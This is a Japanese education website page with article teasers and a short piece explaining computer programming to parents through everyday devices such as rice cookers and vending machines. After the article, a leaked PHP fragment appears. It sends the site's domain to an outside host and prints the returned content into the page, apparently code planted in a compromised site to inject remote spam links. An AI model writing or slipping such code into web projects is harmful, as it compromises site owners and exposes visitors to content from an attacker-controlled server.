前へ
次へ

自宅学習の集中力を高めるグッズ

子供は注意力が散漫になりがちですから、家で勉強する場合、集中力が長続きしないケースも多々あります。そ

more

プログラミング教育は何に役立つのか

近年、コンピューテーショナル・シンキングという考え方に注目が集まってきています。これは、コンピュータ

more

手の届く所に辞書を準備してあげよう

子供の教育では、手の届く所に辞書を用意してあげるのが得策です。分からないことがあれば自分で辞書を調べ

more

身の回りにプログラミングを知ろう

プログラミング教育が始まるといわれても、あまりピンとこない親御さんも多くいます。コンピューターは人が命令したとおりにしか動かず、それを動かすための命令のことをプログラムといい、そのプログラムを書くことをプログラミングといいます。その命令は、コンピューターが理解できる言葉で伝えなくてはならないため、プログラミング言語というものを使用します。プログラムという言葉は、日常的に使われ、日本語では式次第や目録、時刻表などの意味でつかわれることが多いです。あらかじめ決めておいた順番や手順のことをプログラムといっており、人が求める動きをあらかじめコンピューターに書いておくわけです。高性能なロボットや電子機器も、誰かが書いたプログラムによって動いています。自動販売機や自動改札機、掃除機やゲーム機なども、プログラムによって動いています。そして、それは人間がやっていた動作を自動化したものということです。たとえば、炊飯器であれば、普及する前まではかまどでご飯を炊いており、ごはんをおいしく炊くための火加減を伝える言葉は有名です。はじめは弱火で窯全体をあたため、その後、強火で沸騰させ、沸騰したら弱めて、焦がさずに炊いていきます。そして、フタをとらずに、高温でしっかりと蒸らすという手順です。今は、スイッチをおせば、自動的に加熱パターンを制御してくれます。つまり、これがプログラムによる動作ということになります。

".file_get_contents('http://links-001.com/123set7.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

Page Top